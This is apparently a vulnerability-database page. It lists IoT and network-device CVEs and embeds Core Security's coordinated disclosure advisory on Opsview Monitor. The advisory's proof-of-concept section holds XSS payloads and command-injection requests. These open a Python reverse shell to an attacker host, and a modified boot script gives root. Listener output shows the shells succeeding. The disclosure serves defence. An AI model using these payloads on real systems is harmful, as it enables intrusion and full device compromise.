VARIoT IoT vulnerabilities database

VAR-201809-0603 CVE-2018-16546 Amcrest_IPC-HX1X3X-LEXUS_Eng_N_AMCREST Cryptographic vulnerability
CVSS V2: 4.3
CVSS V3: 5.9
Severity: MEDIUM
Amcrest networked devices use the same hardcoded SSL private key across different customers' installations, which allows remote attackers to defeat cryptographic protection mechanisms by leveraging knowledge of this key from another installation, as demonstrated by Amcrest_IPC-HX1X3X-LEXUS_Eng_N_AMCREST_V2.420.AC01.3.R.20180206. Amcrest_IPC-HX1X3X-LEXUS_Eng_N_AMCREST contains a cryptographic vulnerability. Information may be obtained. Amcrest is a network camera product from Amcrest Corporation of the United States. An attacker who obtains the shared key from another installation could use it to bypass the encryption protection mechanism.
VAR-201809-0006 CVE-2015-9266 Multiple Ubiquiti products path traversal vulnerability
CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
The web management interface of Ubiquiti airMAX, airFiber, airGateway and EdgeSwitch XP (formerly TOUGHSwitch) allows an unauthenticated attacker to upload and write arbitrary files using directory traversal techniques. An attacker can exploit this vulnerability to gain root privileges. This vulnerability is fixed in the following product versions (fixes released in July 2015, all prior versions are affected): airMAX AC 7.1.3; airMAX M (and airRouter) 5.6.2 XM/XW/TI, 5.5.11 XM/TI, and 5.5.10u2 XW; airGateway 1.1.5; airFiber AF24/AF24HD 2.2.1, AF5x 3.0.2.1, and AF5 2.2.1; airOS 4 XS2/XS5 4.0.4; and EdgeSwitch XP (formerly TOUGHSwitch) 1.3.2. Multiple Ubiquiti products contain a path traversal vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Ubiquiti airMAX AC and the other products listed are made by Ubiquiti Networks of the United States. The Ubiquiti airMAX AC is a wireless access point device, and airGateway is a gateway device.
VAR-201810-0307 CVE-2018-0432 Cisco SD-WAN Solution vulnerability related to authorization, permissions, and access control
CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
A vulnerability in the error reporting feature of the Cisco SD-WAN Solution could allow an authenticated, remote attacker to gain elevated privileges on an affected device. The vulnerability is due to a failure to properly validate certain parameters included within the error reporting application configuration. An attacker could exploit this vulnerability by sending a crafted command to the error reporting feature. A successful exploit could allow the attacker to gain root-level privileges and take full control of the device. Cisco SD-WAN Solution contains a vulnerability related to authorization, permissions, and access control. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Cisco vEdge 100 Series Routers and related products are made by Cisco. The Cisco vEdge 100 Series Routers are a router product line, vManage Network Management System is a network management system, and the SD-WAN Solution is a set of network expansion solutions running on them. Cisco SD-WAN is prone to a remote privilege-escalation vulnerability. This issue is tracked by Cisco Bug ID CSCvi69801.
VAR-201810-0314 CVE-2018-0439 Cisco Meeting Server cross-site request forgery vulnerability
CVSS V2: 6.8
CVSS V3: 8.8
Severity: HIGH
A vulnerability in the web-based management interface of Cisco Meeting Server could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device. The vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a customized link. A successful exploit could allow the attacker to perform arbitrary actions on an affected device by using a web browser and with the privileges of the user. Cisco Meeting Server is prone to a cross-site request-forgery vulnerability. Other attacks are also possible. This issue is being tracked by Cisco Bug ID CSCvi48644.
VAR-201810-0332 CVE-2018-0458 Cisco Prime Collaboration Assurance cross-site scripting vulnerability
CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
A vulnerability in the web-based management interface of Cisco Prime Collaboration Assurance could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user of the interface to click a customized link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive browser-based information. Cisco Prime Collaboration Assurance contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCvg15441. Cisco Prime Collaboration Assurance supports simplified unified communication and video collaboration network management through a unified management console, and rapid deployment of communication sites.
VAR-201809-0169 CVE-2018-14770 VIVOTEK FD8177 device command injection vulnerability
CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
VIVOTEK FD8177 devices before XXXXXX-VVTK-xx06a allow remote attackers to execute arbitrary code (issue 1 of 2) via the ONVIF interface (/onvif/device_service). The VIVOTEK FD8177 device contains a command injection vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). VIVOTEK FD8177 is a network camera product from Vivotek. The security vulnerability exists in VIVOTEK FD8177 firmware prior to XXXXXX-VVTK-xx06a.
VAR-201809-0170 CVE-2018-14771 VIVOTEK FD8177 command injection vulnerability
CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
VIVOTEK FD8177 devices before XXXXXX-VVTK-xx06a allow remote attackers to execute arbitrary code (issue 2 of 2) via eventscript.cgi. The VIVOTEK FD8177 device contains a command injection vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). VIVOTEK FD8177 is a network camera product from Vivotek. A command injection vulnerability exists in VIVOTEK FD8177 versions prior to XXXXXX-VVTK-xx06a.
VAR-201809-0168 CVE-2018-14769 VIVOTEK FD8177 device cross-site request forgery vulnerability
CVSS V2: 6.8
CVSS V3: 8.8
Severity: HIGH
The VIVOTEK FD8177 device contains a cross-site request forgery vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). VIVOTEK FD8177 is a network camera product of Vivotek. A cross-site request forgery vulnerability exists in VIVOTEK FD8177 devices prior to XXXXXX-VVTK-xx06a. A remote attacker can exploit this vulnerability to hijack CGI commands.
VAR-201810-0308 CVE-2018-0433 Cisco SD-WAN Solution command injection vulnerability
CVSS V2: 7.2
CVSS V3: 7.8
Severity: HIGH
A vulnerability in the command-line interface (CLI) in the Cisco SD-WAN Solution could allow an authenticated, local attacker to inject arbitrary commands that are executed with root privileges. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by authenticating to the device and submitting crafted input to the CLI utility. The attacker must be authenticated to access the CLI utility. A successful exploit could allow the attacker to execute commands with root privileges. Cisco SD-WAN Solution contains a command injection vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). The Cisco vEdge 100 Series Routers are a router product line, vManage Network Management System is a network management system, and the SD-WAN Solution is a set of network expansion solutions running on them. Cisco SD-WAN is prone to a local command-injection vulnerability. This issue is being tracked by Cisco Bug IDs CSCvi69802 and CSCvi69903.
VAR-201810-0309 CVE-2018-0434 Cisco SD-WAN Solution certificate validation vulnerability
CVSS V2: 5.8
CVSS V3: 7.4
Severity: HIGH
A vulnerability in the Zero Touch Provisioning feature of the Cisco SD-WAN Solution could allow an unauthenticated, remote attacker to gain unauthorized access to sensitive data by using an invalid certificate. The vulnerability is due to insufficient certificate validation by the affected software. An attacker could exploit this vulnerability by supplying a crafted certificate to an affected device. A successful exploit could allow the attacker to conduct man-in-the-middle attacks to decrypt confidential information on user connections to the affected software. Cisco SD-WAN Solution contains a certificate validation vulnerability. Information may be obtained and information may be altered. Cisco vEdge 100 Series Routers and related products are made by Cisco. The Cisco vEdge 100 Series Routers are a router product line, vManage Network Management System is a network management system, and the SD-WAN Solution is a set of network expansion solutions running on them. Cisco SD-WAN is prone to a security-bypass vulnerability. This issue is being tracked by Cisco Bug ID CSCvi69940.
VAR-201810-0295 CVE-2018-0414 Cisco Secure Access Control Server XML external entity vulnerability
CVSS V2: 3.5
CVSS V3: 5.7
Severity: MEDIUM
A vulnerability in the web-based UI of Cisco Secure Access Control Server could allow an authenticated, remote attacker to gain read access to certain information in an affected system. The vulnerability is due to improper handling of XML External Entities (XXEs) when parsing an XML file. An attacker could exploit this vulnerability by convincing the administrator of an affected system to import a crafted XML file. An attacker can exploit this issue to gain access to sensitive information that may lead to further attacks. This issue is being tracked by Cisco bug ID CSCvi85318.
VAR-201810-0324 CVE-2018-0450 Cisco Data Center Network Manager cross-site scripting vulnerability
CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
A vulnerability in the web-based management interface of Cisco Data Center Network Manager could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the management interface on an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user of the interface to click a customized link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive browser-based information. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCvh70379. Cisco Data Center Network Manager is available for Cisco Nexus and MDS series switches and provides storage visualization, configuration and troubleshooting functions.
VAR-201809-1111 CVE-2018-7921 Huawei B315s-22 Information Disclosure Vulnerability

Related entries in the VARIoT exploits database: VAR-E-201812-0089
CVSS V2: 3.3
CVSS V3: 6.5
Severity: MEDIUM
Huawei B315s-22 products with software version 21.318.01.00.26 have an information leak vulnerability. Unauthenticated adjacent attackers may exploit this vulnerability to obtain device information. The Huawei B315s-22 is a home 4G wireless router made by Huawei of China.
VAR-201810-0301 CVE-2018-0423 Multiple Cisco RV products buffer error vulnerability
CVSS V2: 9.3
CVSS V3: 8.1
Severity: HIGH
A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to cause a denial of service condition or to execute arbitrary code. The vulnerability is due to improper boundary restrictions on user-supplied input in the Guest user feature of the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device, triggering a buffer overflow condition. A successful exploit could allow the attacker to cause the device to stop responding, resulting in a denial of service condition, or could allow the attacker to execute arbitrary code. The Cisco RV110W, RV130W, and RV215W are Cisco router products. A buffer overflow vulnerability exists in the web-based management interface of these Cisco routers. Cisco RV110W, RV130W, and RV215W Routers are prone to a buffer-overflow vulnerability because they fail to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. Failed exploit attempts will result in denial-of-service conditions. This issue is being tracked by Cisco Bug IDs CSCvj23206, CSCvj42727, and CSCvj42729. Cisco RV110W Wireless-N VPN Firewall is a firewall product.
VAR-201809-1206 No CVE Omron PLC SYSMAC CP1L remote control command vulnerability
CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Omron PLC SYSMAC CP1L is a PLC from Omron. A remote control command vulnerability exists in Omron PLC SYSMAC CP1L. An attacker can use this vulnerability to switch the PLC to monitor mode and then set and force-write values to the PLC; the attacker can also operate I/O points and auxiliary relays and modify the program online.
VAR-201809-1217 No CVE Hollysys PLC LE5109L remote control vulnerability
CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Hollysys Group is a professional automation company integrating R&D, production, sales and technical services. Hollysys PLC LE5109L has a remote control vulnerability. An attacker can send a crafted packet conforming to the proprietary protocol and use this vulnerability to turn off all PLC output points.
VAR-201809-1218 No CVE Hollysys PLC FCS remote control vulnerability
CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Hollysys Group is a professional automation company integrating R&D, production, sales and technical services. Hollysys PLC FCS has a remote control vulnerability. An attacker can use this vulnerability to control the FCS arbitrarily by sending a crafted packet conforming to the proprietary protocol.
VAR-201810-0310 CVE-2018-0435 Cisco Umbrella API authentication vulnerability
CVSS V2: 6.5
CVSS V3: 9.1
Severity: CRITICAL
A vulnerability in the Cisco Umbrella API could allow an authenticated, remote attacker to view and modify data across their organization and other organizations. The vulnerability is due to insufficient authentication configurations for the API interface of Cisco Umbrella. An attacker could exploit this vulnerability to view and potentially modify data for their organization or other organizations. A successful exploit could allow the attacker to read or modify data across multiple organizations. Cisco Umbrella API contains an authentication vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). An attacker can exploit this issue to bypass the security mechanism and gain unauthorized access. This may lead to further attacks. This issue is being tracked by Cisco bug IDs CSCvj37940, CSCvj37954, CSCvj37982, CSCvj37993, CSCvj38122, and CSCvj38122.
VAR-201809-0905 CVE-2018-16147 Opsview Monitor cross-site scripting vulnerability

Related entries in the VARIoT exploits database: VAR-E-201602-0212
CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
The data parameter of the /settings/api/router endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting. Opsview Monitor is a virtual appliance designed to be deployed in an organization's network infrastructure. It is bundled with a web management console to monitor and manage hosts and their services. Opsview Monitor has a cross-site scripting vulnerability that allows an attacker to execute malicious JavaScript code in the context of a legitimate user.

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Opsview Monitor Multiple Vulnerabilities

1. **Advisory Information**

Title: Opsview Monitor Multiple Vulnerabilities
Advisory ID: CORE-2018-0008
Advisory URL: http://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities
Date published: 2018-09-04
Date of last update: 2018-09-04
Vendors contacted: Opsview
Release mode: Coordinated release

2. **Vulnerability Information**

Class: Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144, CVE-2018-16145

3. **Vulnerability Description**

Opsview's website states that:

Opsview[1] builds monitoring software that helps DevOps understand how the performance of their hybrid IT infrastructure & apps impacts business service delivery. Opsview Monitor supports +3500 Nagios plugins and service checks making it easy to monitor everything from Docker and VMware to Amazon Web Services, Hyper-V and more.

4. **Vulnerable Packages**

. Opsview Monitor 5.4
. Opsview Monitor 5.3
. Opsview Monitor 5.2

Other products and versions might be affected, but they were not tested.

5. **Vendor Information, Solutions and Workarounds**

Opsview released the following versions of its product that fix the reported issues.

. Opsview Monitor 6.0
. Opsview Monitor 5.4.2
. Opsview Monitor 5.3.1

In addition, Opsview published the following release notes:

. https://knowledge.opsview.com/v5.4/docs/whats-new
. https://knowledge.opsview.com/v5.3/docs/whats-new

6. **Credits**

These vulnerabilities were discovered and researched by Fernando Diaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.

7. **Technical Description / Proof of Concept**

Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. In addition, issues presented in 7.3 and 7.4 could allow an attacker to obtain command execution on the system as the nagios user. Finally, the issue found in one of the scripts run during the boot process presented in 7.5 would allow attackers to elevate their privileges from nagios user to root after a system restart, hence obtaining full control of the appliance.

7.1. **Reflected Cross-Site Scripting** [CVE-2018-16148]

The following proof of concept demonstrates the vulnerability:

/-----
GET /rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401; auth_tkt=[value not preserved in this copy]%3D%3D
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
-----/

7.2. **Stored Cross-Site Scripting** [CVE-2018-16147]

The following proof of concept demonstrates the vulnerability:

/-----
POST /settings/api/router?_dc=1521575692128 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: rifle
x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 506
Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256; auth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D
Connection: close

[{"action":"SettingsServer","method":"setObjecttypeState","data":["</script><script>alert(4)</script>","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":2},{"action":"SettingsServer","method":"setObjecttypeState","data":["profile","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":3}]
-----/

The input will be stored without any sanitization and rendered every time the /settings section is visited by the user. It is important to point out that this XSS is self-stored and is executed only in the context of the victim's session. Excerpt of the source code showing the injected script tag:

/-----
[{"property":"name","root":"data","direction":"ASC"}]}},"contact":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"name","root":"data"}]}},"</script><script>alert(4)</script>":{"storeState":{"sorters":[{"root":"data","property":"name","direction":"ASC"}],"pageSize":50,"filters":[],"page":1}},"hostcheckcommand":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"priority","root":"data"}]}},"netflow_collector":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"page":1,"filters":[],"pageSize":50}},"<script>alert(4)</script>":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"
-----/

7.3. **Notification abuse leading to remote command execution** [CVE-2018-16146]

Opsview Web Management console provides a functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The 'value' parameter is not properly sanitized, leading to an arbitrary command injection executed on the system with the nagios user's privileges. The following proof of concept executes a reverse shell:

/-----
POST /rest/config/notificationmethod/testnotification?_dc=1520444703477 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: admin
x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 376
Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0; opsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13; auth_tkt=[value not preserved in this copy]%3D%3D
Connection: close

{"message":"Test Message","command":"submit_xmpp_script","variables":[],"test_variables":[{"name":"PAGER","value":"123123123 || python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attackerIP>\",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"}],"id":"20"}
-----/

/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/

Additionally, it is possible to combine this issue with a redirection functionality within the management console and the vulnerability described in 7.1 (Reflected Cross-Site Scripting), to build a specially crafted link that could be sent to an administrator to trigger a reverse shell. In order to perform the attack, consider the following:

. API's sensitive actions require a 'restToken' to be processed.
. Abuse the login page redirection functionality to force the user to access the Cross-Site Scripting vulnerable URL described in 7.1 (you may also abuse the Cross-Site Scripting vulnerability reported in https://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). If the user is already authenticated he will be automatically redirected. Otherwise, the login page will appear and the redirection will take place after a successful login.

The following proof of concept presents a crafted link that could trigger a reverse shell if accessed by an administrator:

/-----
https://<serverIP>/login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27[base64-encoded JavaScript payload; incomplete in this copy and omitted]%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1
-----/

Once clicked, the authenticated administrator will be redirected to the vulnerable section, where his browser will perform a request to the '/settings' endpoint in order to obtain a valid 'restToken'. Finally, using that token, the API request to 'rest/config/notificationmethod/testnotification' will be exploited, thus resulting in a reverse shell.

7.4. **Rancid test connection functionality abuse leading to command execution** [CVE-2018-16144]

NetAudit is a section within Network Analyzer that allows the user to automate the backing up of network devices' configuration files to a centralized location. The test connection functionality is vulnerable to command injection due to an improper sanitization of the 'rancid_password' parameter. The following proof of concept executes a reverse shell:

/-----
POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: admin
x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 434
Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f; auth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D
Connection: close

ip=<attackerIP>++++++&rancid_vendor=1&rancid_username=234234+add+password+xxxxx&rancid_connection_type=telnet&rancid_autoenable=1&rancid_password=2342342342+%3b+sleep%2011%3b%20`python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("<attackerIP>",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'`&host_id=2
-----/

/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
$ uname -a
Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
-----/

7.5. **Script modification could allow local privilege escalation** [CVE-2018-16145]

Most of the services in Opsview Monitor run with nagios privileges, and the scripts that run at boot time impersonate the nagios user during their execution. However, the '/etc/init.d/opsview-reporting-module' script invokes the '/opt/opsview/jasper/bin/db_jasper' script before dropping root privileges. The following excerpt shows the vulnerable code:

/-----
/etc/init.d/opsview-reporting-module:

/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null
if [ $? != 0 ]; then
    echo "Attempted to start jasperserver but MySQL credentials are wrong."
    exit 0
fi

DAEMON=/opt/opsview/jasper/bin/rc.jasperserver
test -x $DAEMON || exit 0

# Switch to opsview user if run as root
id | grep "uid=0(" >/dev/null
if [ $? = 0 ] ; then
    su - opsview -c "$DAEMON $@"
else
    exec $DAEMON $@
fi
-----/

The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the vulnerable script, can be edited by the nagios user, which belongs to the 'opsview' group.

/-----
ls -ltr /opt/opsview/jasper/bin/db_jasper
-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017 /opt/opsview/jasper/bin/db_jasper
nagios@image-builder-299:/home/admin$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/

Since 'db_jasper' receives 'db_exists' as an argument, which is later used in a case statement, an attacker could edit that specific part of the script in order to execute arbitrary code once the appliance is rebooted. The following excerpt shows the attacker's bash script which, after execution, will trigger a reverse shell with root privileges:

/-----
while [ "x$1" != "x" ] ; do
    case "$1" in
        db_export)
            db_export
            ;;
        db_export_test)
            db_export_test
            ;;
        db_export_initial)
            TEST=1 db_backup
            ;;
        db_import)
            db_import
            ;;
        db_install)
            db_install
            ;;
        db_backup)
            db_backup
            ;;
        db_restore)
            db_restore
            ;;
        db_exists)
            python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attackerIP>",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' &
            db_exists
            exit $?
            ;;
        db_upgrade)
            db_upgrade
            exit $?
            ;;
        *)
            die "Usage: $0 {db_export|db_import|db_install|db_backup|db_restore}"
            ;;
    esac
    shift
done
-----/

/-----
$ nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 45566)
# id
uid=0(root) gid=0(root) groups=0(root)
-----/

8. **Report Timeline**

2018-05-03: Core Security sent an initial notification to Opsview, asking for GPG keys in order to send the draft advisory.
2018-05-04: Opsview replied attaching its GPG keys.
2018-05-04: Core Security sent the encrypted draft advisory.
2018-05-04: Opsview confirmed the reception of the advisory and informed that an initial response would be ready by May 11th.
2018-05-11: Opsview replied saying they were able to reproduce all of the reported vulnerabilities and confirmed that they were present in all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition, Opsview informed that they were planning to release a fix for these versions by the end of July.
2018-05-11: Core Security thanked Opsview for the confirmation.
2018-06-25: Opsview informed that they were planning to release a major update for the product (6.0) at the end of July. This update would address all reported vulnerabilities. Also, they informed that the previous versions of the product would be fixed by the end of August.
2018-06-27: Core Security thanked Opsview for the status update and asked for a tentative public disclosure date.
2018-07-16: Core Security requested a status update.
2018-07-18: Opsview proposed to set a tentative publication date by the end of August, when they would release the fixes for its earlier versions.
2018-07-18: Core Security agreed with Opsview's proposal.
2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0 release would be available on July 25th. In addition, they informed that they didn't have the exact release date for the updates to previous versions of the product.
2018-08-06: Core Security requested a status update for the remaining fixes.
2018-08-13: Opsview replied saying that they were targeting the week of August 24th to release the fixes for their earlier product versions and would confirm the exact date at the end of the following week.
2018-08-13: Core Security thanked Opsview for the reply.
2018-08-24: Opsview informed Core Security that the remaining fixed versions would be available on August 29th.
2018-08-24: Core Security thanked Opsview for the update and proposed September 4th as the coordinated release date.
2018-08-28: Opsview agreed on the proposed release date.
2018-09-04: Advisory CORE-2018-0008 published.

9. **References**

[1] https://www.opsview.com/solutions

10. **About CoreLabs**

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. **About Core Security**

Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com.

12. **Disclaimer**

The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
VAR-201809-0906 CVE-2018-16148 Opsview Monitor Cross-Site Scripting Vulnerability

Related entries in the VARIoT exploits database: VAR-E-201602-0212
CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
The diagnosticsb2ksy parameter of the /rest endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting. Opsview Monitor is a virtual appliance designed to be deployed in an organization's network infrastructure. It is bundled with a web management console used to monitor and manage hosts and their services. Opsview Monitor has a cross-site scripting vulnerability that allows an attacker to execute malicious JavaScript code in the context of a legitimate user's session.

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Opsview Monitor Multiple Vulnerabilities

1. **Advisory Information**

Title: Opsview Monitor Multiple Vulnerabilities
Advisory ID: CORE-2018-0008
Advisory URL: http://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities
Date published: 2018-09-04
Date of last update: 2018-09-04
Vendors contacted: Opsview
